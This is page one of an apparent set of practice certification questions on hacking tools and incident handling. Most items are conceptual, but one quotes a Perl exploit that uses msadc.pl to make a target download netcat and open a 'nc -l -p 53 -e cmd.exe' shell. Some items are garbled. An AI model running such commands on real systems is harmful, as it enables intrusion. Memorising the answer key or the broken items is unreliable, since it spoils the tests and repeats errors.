Hacker Tools, Techniques, Exploits and Incident Handling v7.1

Page:    1 / 22   
Exam contains 328 questions

John, a part-time hacker, has accessed in unauthorized way to the www.yourbank.com banking Website and stolen the bank account information of its users and their credit card numbers by using the SQL injection attack. Now, John wants to sell this information to malicious person Mark and make a deal to get a good amount of money. Since, he does not want to send the hacked information in the clear text format to Mark; he decides to send information in hidden text. For this, he takes a steganography tool and hides the information in ASCII text by appending whitespace to the end of lines and encrypts the hidden information by using the IDEA encryption algorithm. Which of the following tools is
John using for steganography?

  • A. Image Hide
  • B. 2Mosaic
  • C. Snow.exe
  • D. Netcat

Answer : C

You run the following command while using Nikto Web scanner:
perl nikto.pl -h -p 443
What action do you want to perform?

  • A. Using it as a proxy server
  • B. Updating Nikto
  • C. Seting Nikto for network sniffing
  • D. Port scanning

Answer : D

Which of the following is spy software that records activity on Macintosh systems via snapshots, keystrokes, and Web site logging?

  • A. Spector
  • B. Magic Lantern
  • C. eblaster
  • D. NetBus

Answer : A

Adam, a malicious hacker performs an exploit, which is given below:
$port = 53;
# Spawn cmd.exe on port X
$your = "";# Your FTP Server 89
$user = "Anonymous";# login as
$pass = '[email protected]';# password
$host = $ARGV[0];
print "Starting ...\n";
print "Server will download the file nc.exe from $your FTP server.\n"; system("perl msadc.pl -h $host -C \"echo open $your >sasfile\""); system("perl msadc.pl -h $host -C \"echo $user>>sasfile\""); system("perl msadc.pl -h
$host -C \"echo $pass>>sasfile\""); system("perl msadc.pl -h $host -C \"echo bin>>sasfile\""); system("perl msadc.pl -h $host -C \"echo get nc.exe>>sasfile\""); system("perl msadc.pl -h $host C \"echo get hacked. html>>sasfile\""); system("perl msadc.pl -h $host -C \"echo quit>>sasfile\""); print "Server is downloading ...
system("perl msadc.pl -h $host -C \"ftp \-s\:sasfile\""); print "Press ENTER when download is finished ...
(Have a ftp server)\n";
$o=; print "Opening ...\n";
system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\""); print "Done.\n";
#system("telnet $host $port"); exit(0);
Which of the following is the expected result of the above exploit?

  • A. Creates a share called "sasfile" on the target system
  • B. Creates an FTP server with write permissions enabled
  • C. Opens up a SMTP server that requires no username or password
  • D. Opens up a telnet listener that requires no username or password

Answer : D

Which of the following password cracking attacks is based on a pre-calculated hash table to retrieve plain text passwords?

  • A. Rainbow attack
  • B. Brute Force attack
  • C. Dictionary attack
  • D. Hybrid attack

Answer : A

Which of the following types of attacks is the result of vulnerabilities in a program due to poor programming techniques?

  • A. Evasion attack
  • B. Denial-of-Service (DoS) attack
  • C. Ping of death attack
  • D. Buffer overflow attack

Answer : D

Which of the following methods can be used to detect session hijacking attack?

  • A. nmap
  • B. Brutus
  • C. ntop
  • D. sniffer

Answer : D

is true?

  • A. It manages security credentials and public keys for message encryption.
  • B. It is a collection of files used by Microsoft for software updates released between major service pack releases.
  • C. It is a condition in which an application receives more data than it is configured to accept.
  • D. It is a false warning about a virus.

Answer : C

John works as a professional Ethical Hacker. He has been assigned the project of testing the security of www.we-are-secure.com. He finds that the We-are-secure server is vulnerable to attacks. As a countermeasure, he suggests that the Network Administrator should remove the IPP printing capability from the server. He is suggesting this as a countermeasure against __________.

  • A. IIS buffer overflow
  • B. NetBIOS NULL session
  • C. SNMP enumeration
  • D. DNS zone transfer

Answer : A

Adam has installed and configured his wireless network. He has enabled numerous security features such as changing the default SSID, enabling WPA encryption, and enabling MAC filtering on his wireless router. Adam notices that when he uses his wireless connection, the speed is sometimes 16 Mbps and sometimes it is only 8 Mbps or less.
Adam connects to the management utility wireless router and finds out that a machine with an unfamiliar name is connected through his wireless connection. Paul checks the router's logs and notices that the unfamiliar machine has the same MAC address as his laptop.
Which of the following attacks has been occurred on the wireless network of Adam?

  • A. NAT spoofing
  • B. DNS cache poisoning
  • C. MAC spoofing
  • D. ARP spoofing

Answer : C

Which of the following is a technique of using a modem to automatically scan a list of telephone numbers, usually dialing every number in a local area code to search for computers, Bulletin board systems, and fax machines?

  • A. Demon dialing
  • B. Warkitting
  • C. War driving
  • D. Wardialing

Answer : D

Which of the following tools can be used to detect the steganography?

  • A. Dskprobe
  • B. Blindside
  • C. ImageHide
  • D. Snow

Answer : A

Which of the following statements are true about a keylogger?
Each correct answer represents a complete solution. Choose all that apply.

  • A. It records all keystrokes on the victim's computer in a predefined log file.
  • B. It can be remotely installed on a computer system.
  • C. It is a software tool used to trace all or specific activities of a user on a computer.
  • D. It uses hidden code to destroy or scramble data on the hard disk.

Answer : A,B,C

Which of the following commands can be used for port scanning?

  • A. nc -t
  • B. nc -z
  • C. nc -w
  • D. nc -g

Answer : B

You work as a Penetration Tester for the Infosec Inc. Your company takes the projects of security auditing. Recently, your company has assigned you a project to test the security of the we-aresecure.com Web site. For this, you want to perform the idle scan so that you can get the ports open in the we-are-secure.com server. You are using Hping tool to perform the idle scan by using a zombie computer. While scanning, you notice that every IPID is being incremented on every query, regardless whether the ports are open or close.
Sometimes, IPID is being incremented by more than one value.
What may be the reason?

  • A. The firewall is blocking the scanning process.
  • B. The zombie computer is not connected to the we-are-secure.com Web server.
  • C. The zombie computer is the system interacting with some other system besides your computer.
  • D. Hping does not perform idle scanning.

Answer : C

Page:    1 / 22   
Exam contains 328 questions

Talk to us!

Have any questions or issues ? Please dont hesitate to contact us

Certlibrary doesn't offer Real Microsoft Exam Questions.
Certlibrary Materials do not contain actual questions and answers from Cisco's Certification Exams.
CFA Institute does not endorse, promote or warrant the accuracy or quality of Certlibrary. CFA® and Chartered Financial Analyst® are registered trademarks owned by CFA Institute.